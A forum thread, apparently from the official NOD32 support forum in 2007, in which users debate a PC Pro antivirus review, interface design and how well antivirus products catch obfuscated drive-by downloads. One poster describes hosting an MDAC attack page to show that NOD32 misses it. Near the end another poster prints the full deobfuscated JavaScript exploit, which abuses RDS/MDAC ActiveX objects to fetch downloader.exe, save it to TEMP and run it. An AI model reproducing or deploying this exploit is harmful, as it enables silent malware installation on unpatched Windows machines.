UK's PC Pro Review

the whole point of big large buttons - like "Protection ON" and "Secured" are to keep the masses who have no idea about the internal workings of a complex software system like an antivirus from thinking... they don't WANT to know the ins and outs of how they are protected (for the vast majority) - that's a reality. You and I are NOT in the majority in wanting finite control over our own protection system. You and I are "power users" - and those kinds of dumbed down interfaces are what the majority of the world wants/needs to NOT be overwhelmed by the thought process of trying to understand what an antithreat solution must actually accomplish.

Pure and simple... simple interfaces are what the unwashed masses want... ESS's new interface goes a LONG way to help there.

 

Come on... you know how the world at large works... publishing is no different...

it's not what you know in general that gets you into a position of trust and "power" - it's WHO you know... he probably want to Cambridge with someone higher up in the magazine's hierarchy - that's all the qualification it takes to become an "expert" in the eyes of your compadres... it's not a question of being a "real" expert!

 

Actually NOD32 is not very good at generically detecting drive-by downloads that have been obfuscated by JavaScript. I say generically, because one can easily and constantly writing string-based signatures for each version of obfuscation out there. But if a new one comes out, the signature is useless. Kaspersky has some level of JScript interpreter so it can deobfuscate some obfuscation algorithms but as soon as you use math functions in the obfuscation Kaspersky is screwed. Is NOD32 even that good ? I dont know. NIS2008 Beta is the only product I have tested so far that can generically detect drive-by downloads no matter what kind of obfuscation is used.

So overall, at least in this area, NOD is falling behind.

 

All AVs should start to include a JavaScript interpreter.

 

if the AMON module finds the threat, why try and keep up with an ever moving target of obfusticating downloader code?

As I understand it, IMON is going to be axed - so as long as AMON grabs the malware, I don't care if it actually gets onto my machine - I ONLY care that it is grabbed before it can execute and do any harm.

 

And replaced with a new HTTP scanner.

 

That is not going to work just because of the scope of the APIs that would have to be implemented. Security vendors could spend years implemented such an interpreter and during that time the bad guys will continue to find JScript APIs that are not interpreted and will bypass the protection.


I have attached a file that contains obfuscated HTML for the MDAC attack. Rename it to an html and host it on a web server. Copy a file called downloader.exe into the same directory as the html on the webserver. Browse to this web page using an unpatched XP SP2 machine running ESS or NOD32 2.7. The downloader.exe will run, proving that NOD has zero protection against drive-by downloads.

Btw.. the obfuscated HTML was created using a tool I created. It will create a completely random unique HTML everytime I run it. No, I will not release the tool for obvious reasons. NOD 2.7 and ESS are completely useless at detecting this, so is Kaspersky 7. NIS 2008 Beta can, but the older versions can't. Strange.

 

AMON does not detect the malware, because the malware is constantly changing, just like the obfuscated JScript. There are many examples of live websites today that generate a new malware executable everytime you visit that URL and these executables are not detected by NOD.

Remember that there are 4 pieces here: the vulnerability (which doesn't change), the JScript that implements the vulnerablity (this is constantly being obfuscated and changed), the downloader.exe (constantly changing) and the malware that the downloader downloads (against constantly changing). The only way to provide proactive protection is to generically detect the vulnerability. All other methods are reactive.

 

Why are they changing the HTTP Scanner ?

 

I actually have no idea

Im not sure how the new scanner will work... although I think I read somewhere that the winsock level scanner will be replaced with an NDIS filter... im not sure so dont quote me on it.

 

get used to it - Antivirus is reactive because of the porous operating system you CHOOSE to use.

 

No actually I dont get used to it - I just switch over to products that have better proactive protection. For example, today 15th July 2007, here is a website which if you visit it, the machine will be infected with a completely updated NOD 2.7 or ESS. [url removed - no links to active malware allowed - Blue]


Btw.. which OS do you use ?

 

Because of its current nature . IMON works in the Winsock level . Unfortunately too many programs touch there and could possibly damage the Winsock and stop the network connection . IMON requires "clean" Winsock to work well

 

My operating systems of choice are not always MY choice, but chosen instead because of applications I either MUST, or would prefer to have an option to run... so a run-down of my computers, current and past begins...

At the moment...

in the office I run windows xp pro on all my machines except a test server running CentOS, at home I have a windows gaming machine with XP Pro. I also have an intel macbook with dualboot, MacOS 10 Tiger and Win XP pro partition with NOD32 on it (for work related issues I have to vpn/remote desktop to work and MacOS won't do that with our current vpn).... for working servers, I run a cluster of a dozen various unix flavors (I have 20+ years unix admin experience) - some Trustix, some CentOS and the new mailservers I'm currently speccing to build will be BSD flavored - Dual QuadCore beasts. I use whatever operating system best fits the job with the knowledge at hand... and I adapt... like I'll be upgrading the vpn at the office so that I don't HAVE to use windows XP to vpn in!

Previous incarnations of personal machine have ranged from xp, win2k, redhat, win 98, win 95, win 3.1, macos 7 + 8, and a whole hosts of machines I learned on prior to work such as Amstrads (both a PCW and CPC) Commodores Amiga and C64 before that and even a Sinclair Spectrum 48k...

I am, if nothing, aware of my choices - and take appropriate hardening actions for said machines...

 

Hehe, I feel like such a "n00b"

 

How come there are so many fanboys of NOD32? Its just an AV product. Why get angry about peopole not liking the product?

 

Couldn't agree more. I too like the interface of KAV & Nod32, maybe I'm just oldschool? Everything is where I want it to be. People that can't figure it out probably don't belong anywhere near a computer in the first place, it really is not rocket science.

Most peoples idea of a good interface nowadays is for it to say "You Are Protected" in big green letters, giving one a false sense of security. That kind of stuff doesn't impress me. I don't care how pretty it looks... just shut up and do your job and we'll get along just fine.

Also I've been a very satisfied Nod32 v2.7 user for months now, and combined with common sense and safe browsing habits nothing has penetrated it. Once in awhile I go to other sites to do scans to see if it missed anything. It never does. I just can't fathom that the next AV is any better detection wise, but the tests show otherwise.

I have no plans to switch anytime soon, regardless of articles such as this.

 

Hi mykemyk,

This is the official Nod32 support forum; some of the posters will take a poor review personally... just like posters on other official AV forums do when a less than stellar review is published about "their" AV

If you want to see the real "fanboys" go at it, please read some test results threads in the other AV software forum...that's when they all come out of the woodwork ...

Cheers.

 

you got that right cus.

 

I'm nost really sure that they were using NOD32 when they discovered this new profile feature....
I realise that the on-demand scanner has this feature but I'm not sure how that relates to real time operations...

The writer has acheived his purposes I think - he has filled his word quota, related his experience and perception, and the results of his testing and at the same time has created discussion of his article, driven traffic to the web site and probably sold more magazines.

Whether or not this person was qualified to do any of these things I do not know but it does not matter - If four people were reviewing oranges and one likes oranges, one really really likes oranges, one dislikes oranges and one really really dislikes oranges, what sort of reports do you think that they would write?

Cheers

 

We've been waiting for version 3 now for a year. Its a shame that Eset is taking so long to finish it.

I don't like the current interface with all these modules either and I suspect neither does Eset, a major reason version 3 is coming out. So the reviewers criticism is valid.

My licenses will run out in three weeks. Since version 3 is not ready, I'll be trying out Kasperski, F-Secure and last if out of beta NOD version 3 before I pay for new subscriptions.

 

True, it is a product but there is also another side here:

AV-testing has been under spotlight for a while, the methods and ranked results are becoming nothing but a mockery. In some cases the lowest ranked product by some ‘independent AV tester will outperform every other product in the same week of testing by another tester. Add insult to that by enduring the boast of some AV-gurus who always post on forums how they poke holes on the AV products.

I am not offended by Reviewers not liking a particular product (including NOD 32) but perhaps some users have come to take things too personal and worship products. Security is much more complex than performance of products. We all know the weakest link in security is the USER. I hope that no AV vendor will feel financial pressure and get tempted to over-hype the effectiveness of his/her product by misleading adverts or reviews/awards.

 

Well , with all my best regards , this is not true . Let me explain why.
First , ESET is excellent but small company . Keep in mind that they are good but small team - they don't have the same resourses and manpower like Microsoft/Symantec/McAfee ... but they are still top . Because of this reason they act slowly and carefully and even though it is slow step up , it is good step up .

ESET are small team but they responde to all users want - they make new Linux products , they make Online Scanner , they do support NOD32 v2 , they create new Suit , they made Mobile AV ...

You can't compare the manpower of ESET to that of Microsoft or to that of Symantec , but still ESET are top player when it comes to quality .

When talking about quality , I am not sure if any of you have noticed but ESET are company with real quality control . ESET will never push software which is ~unstable~ and which can make a real computer-quake (earthquake) , which can bring any machine to an complete data loss and complete no-boot . Not so many resourses but they act slowly and qualitive . I am sure we can all call some vendors' names which play games , every new year = new suit (2005-new suit , 2006-new suit , 2007-new suit , 2H of 2007 - new suit =2008 , I am sure they'll have new product 2009 ready in March 2008 ) . These vendors have no quality control no matter what some may tell . We have all seen it and those products are not stable and really working until their first or second big update . They publish earlier "new stuff" because these vendors have nothing else to offer and thus the new version is a combo of the Marketing dept and the Development dept. to make users pay some attention to them.

Even though we see the development of the new Eset products - we still have the old ones which are not worse (I mean the new ones are much better but the old one still work effectively) . Although I am not inside ESET I am 100% sure they will not push a new products for the mass-public unless it is completely ready

Regards!

 

I am going to have to differ with you on that one. There is an old saying that you can put your profits in your pocket, or back into your company. Eset has done very well and they have earned it. But the small company reference you make doesnt hold water with me. Avira is a company of around about 250 folks and they do seem to get it right. It is all in where you lay your priorities as a company.

 

It may be obfuscated but it's not hard to decipher:

Code:

[FONT=COURIER NEW][COLOR=#0000a0][B]function[/B][/COLOR][COLOR=#000000]CreateO[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]o[/COLOR][COLOR=#008080], [/COLOR][COLOR=#000000]n[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]null[/COLOR][COLOR=#008080];
 
    [/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]eval[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'r = o.CreateObject(n)'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#000000]}catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}
 
[/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]![/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]eval[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'r = o.CreateObject(n, "")'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#000000]}catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}
    }[/COLOR][COLOR=#008080] 
 
    [/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]![/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]      try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]eval[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'r = o.CreateObject(n, "", "")'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#000000]}catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}[/COLOR][COLOR=#008080] 
    [/COLOR][COLOR=#0000a0][B]}[/B]
 
[/COLOR][COLOR=#000000]  if[/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]![/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#008080] 
[/COLOR][COLOR=#000000]      try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]eval[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'r = o.GetObject("", n)'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#000000]}catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}[/COLOR][COLOR=#008080] 
    [/COLOR][COLOR=#0000a0][B]}[/B]
 
[/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]![/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]eval[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'r = o.GetObject(n, "")'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#000000]}catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}
    }[/COLOR][COLOR=#008080] 
 
    [/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]![/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]      try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]eval[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'r = o.GetObject(n)'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#000000]}catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}[/COLOR][COLOR=#008080] 
    [/COLOR][COLOR=#0000a0][B]}[/B]
 
[/COLOR][COLOR=#0000a0][B]return[/B][/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]r[/COLOR][COLOR=#008080]);
[/COLOR][COLOR=#0000a0][B]}[/B]
 
 
[B]function[/B][/COLOR][COLOR=#000000]Go[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#008080] 
    [/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]s[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]CreateO[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080], "WScript.Shell");
    [/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]o[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]CreateO[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080], "ADODB.Stream");
    [/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]s[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]Environment[/COLOR][COLOR=#008080]("Process");
 
[/COLOR][COLOR=#800000]// form the path to the actual downloader.exe
[/COLOR][COLOR=#000000] 
[/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]url[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#0000a0][B]document[/B][/COLOR][COLOR=#008080].[/COLOR][COLOR=#0000a0][B]location[/B][/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]toString[/COLOR][COLOR=#008080] ();
    [/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]num[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]url[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]lastIndexOf[/COLOR][COLOR=#008080] ("/");    [/COLOR][COLOR=#800000]// find the last slash
[/COLOR][COLOR=#000000]  url[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]url[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]substring[/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000080][B]0[/B][/COLOR][COLOR=#008080], [/COLOR][COLOR=#000000]num[/COLOR][COLOR=#008080]);
        [/COLOR][COLOR=#000000]url[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]url[/COLOR][COLOR=#000080][B]+[/B][/COLOR][COLOR=#008080] "/downloader.exe";
 
[/COLOR][COLOR=#000000]  var[/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]null[/COLOR][COLOR=#008080]; 
    [/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]bin[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]Item[/COLOR][COLOR=#008080]("TEMP") [/COLOR][COLOR=#000080][B]+[/B][/COLOR][COLOR=#008080] "downloader.exe";
[/COLOR][COLOR=#000000]  var[/COLOR][COLOR=#000000]dat[/COLOR][COLOR=#008080]; 
 
    [/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080]=[/COLOR][COLOR=#000000]new[/COLOR][COLOR=#000000]XMLHttpRequest[/COLOR][COLOR=#008080](); [/COLOR][COLOR=#0000a0][B]}[/B]
[/COLOR][COLOR=#000000]catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]new[/COLOR][COLOR=#000000]ActiveXObject[/COLOR][COLOR=#008080]("Microsoft.XMLHTTP"); [/COLOR][COLOR=#0000a0][B]}[/B]
[/COLOR][COLOR=#000000]catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]          xml[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]new[/COLOR][COLOR=#000000]ActiveXObject[/COLOR][COLOR=#008080]("MSXML2.ServerXMLHTTP"); 
[/COLOR][COLOR=#000000]      }[/COLOR][COLOR=#008080] 
    [/COLOR][COLOR=#0000a0][B]}[/B]
 
[/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]![/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]return[/B][/COLOR][COLOR=#008080]([/COLOR][COLOR=#000080][B]0[/B][/COLOR][COLOR=#008080]);
 
    [/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]open[/COLOR][COLOR=#008080]("GET", [/COLOR][COLOR=#000000]url[/COLOR][COLOR=#008080], [/COLOR][COLOR=#000000]false[/COLOR][COLOR=#008080]);
    [/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]send[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]null[/COLOR][COLOR=#008080]);
    [/COLOR][COLOR=#000000]dat[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]xml[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]responseBody[/COLOR][COLOR=#008080];
 
    [/COLOR][COLOR=#000000]o[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]Type[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000080][B]1[/B][/COLOR][COLOR=#008080];
    [/COLOR][COLOR=#000000]o[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]Mode[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000080][B]3[/B][/COLOR][COLOR=#008080];
[/COLOR][COLOR=#000000]  o[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]Open[/COLOR][COLOR=#008080](); 
    [/COLOR][COLOR=#000000]o[/COLOR][COLOR=#008080].[/COLOR][COLOR=#008000][B]Write[/B][/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]dat[/COLOR][COLOR=#008080]);
    [/COLOR][COLOR=#000000]o[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]SaveToFile[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]bin[/COLOR][COLOR=#008080], [/COLOR][COLOR=#000080][B]2[/B][/COLOR][COLOR=#008080]);
 
    [/COLOR][COLOR=#000000]s[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]Run[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]bin[/COLOR][COLOR=#008080],[/COLOR][COLOR=#000080][B]0[/B][/COLOR][COLOR=#008080]);
[/COLOR][COLOR=#0000a0][B]}[/B]
 
[B]function[/B][/COLOR][COLOR=#000000]Exploit[/COLOR][COLOR=#008080]() [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]  var[/COLOR][COLOR=#000000]i[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000080][B]0[/B][/COLOR][COLOR=#008080]; 
[/COLOR][COLOR=#800000]//                    RDS Data control                        RDS Data Control             Business object factory
[/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]t[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]new[/COLOR][COLOR=#000000]Array[/COLOR][COLOR=#008080]([/COLOR][COLOR=#008000]'{BD96C556-65A3-11D0-983A-00C04FC29E36}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#800000]/*'{BD96C556-65A3-11D0-983A-00C04FC29E36}',*/[/COLOR][COLOR=#008000]'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{0006F033-0000-0000-C000-000000000046}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{0006F03A-0000-0000-C000-000000000046}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{6414512B-B978-451D-A0D8-FCFDF33E833C}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{06723E09-F4C2-43c8-8358-09FCD1DB0766}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{639F725F-1B2D-4831-A9FD-874847682010}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{BA018599-1DB3-44f9-83B4-461454C84BF8}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#008000]'{E8CCCDDF-CA28-496b-B050-6C07C962476B}'[/COLOR][COLOR=#008080],[/COLOR][COLOR=#000000]null[/COLOR][COLOR=#008080]);
 
    [/COLOR][COLOR=#0000a0][B]while[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]t[/COLOR][COLOR=#008080][[/COLOR][COLOR=#000000]i[/COLOR][COLOR=#008080]]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]null[/COLOR][COLOR=#008080];
 
        [/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]t[/COLOR][COLOR=#008080][[/COLOR][COLOR=#000000]i[/COLOR][COLOR=#008080]].[/COLOR][COLOR=#000000]substring[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000080][B]0[/B][/COLOR][COLOR=#008080],[/COLOR][COLOR=#000080][B]1[/B][/COLOR][COLOR=#008080]) == [/COLOR][COLOR=#008000]'{'[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]          a[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#0000a0][B]document[/B][/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]createElement[/COLOR][COLOR=#008080]("object"); 
[/COLOR][COLOR=#000000]          a[/COLOR][COLOR=#008080].[/COLOR][COLOR=#000000]setAttribute[/COLOR][COLOR=#008080]("classid", "clsid:" [/COLOR][COLOR=#000080][B]+[/B][/COLOR][COLOR=#000000]t[/COLOR][COLOR=#008080][[/COLOR][COLOR=#000000]i[/COLOR][COLOR=#008080]].[/COLOR][COLOR=#000000]substring[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000080][B]1[/B][/COLOR][COLOR=#008080], [/COLOR][COLOR=#000000]t[/COLOR][COLOR=#008080][[/COLOR][COLOR=#000000]i[/COLOR][COLOR=#008080]].[/COLOR][COLOR=#000000]length[/COLOR][COLOR=#008080] - [/COLOR][COLOR=#000080][B]1[/B][/COLOR][COLOR=#008080])); 
        [/COLOR][COLOR=#0000a0][B]}[/B][/COLOR][COLOR=#0000a0][B]else[/B][/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B][/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]new[/COLOR][COLOR=#000000]ActiveXObject[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]t[/COLOR][COLOR=#008080][[/COLOR][COLOR=#000000]i[/COLOR][COLOR=#008080]]); [/COLOR][COLOR=#0000a0][B]}[/B][/COLOR][COLOR=#000000]catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}
[/COLOR][COLOR=#0000a0][B]}[/B]
 
[/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#000000]try[/COLOR][COLOR=#0000a0][B]{[/B]
[/COLOR][COLOR=#0000a0][B]var[/B][/COLOR][COLOR=#000000]b[/COLOR][COLOR=#008080] = [/COLOR][COLOR=#000000]CreateO[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080], "WScript.Shell");
                [/COLOR][COLOR=#0000a0][B]if[/B][/COLOR][COLOR=#008080] ([/COLOR][COLOR=#000000]b[/COLOR][COLOR=#008080]) [/COLOR][COLOR=#0000a0][B]{[/B]
 
[/COLOR][COLOR=#000000]Go[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]a[/COLOR][COLOR=#008080]);
                    [/COLOR][COLOR=#0000a0][B]return[/B][/COLOR][COLOR=#008080]([/COLOR][COLOR=#000080][B]0[/B][/COLOR][COLOR=#008080]);
                [/COLOR][COLOR=#0000a0][B]}[/B]
[/COLOR][COLOR=#0000a0][B]}[/B][/COLOR][COLOR=#000000]catch[/COLOR][COLOR=#008080]([/COLOR][COLOR=#000000]e[/COLOR][COLOR=#008080])[/COLOR][COLOR=#000000]{}
        }[/COLOR][COLOR=#008080] 
        [/COLOR][COLOR=#000000]i++[/COLOR][COLOR=#008080];
    [/COLOR][COLOR=#0000a0][B]}[/B]
 
[B]}[/B]
 
[/COLOR][COLOR=#000000]Exploit[/COLOR][COLOR=#008080]();[/COLOR][/FONT]

And usually it's a tip off when there are more than three prompts for activeX etc...



Hardly what I'd call a drive-by download when it requires user permission...

Cheers

edit: Sorry, you said 'unpatched' SP2 didn't you...
What does this have to do with UK's PC Pro Review anyway? I must have missed something...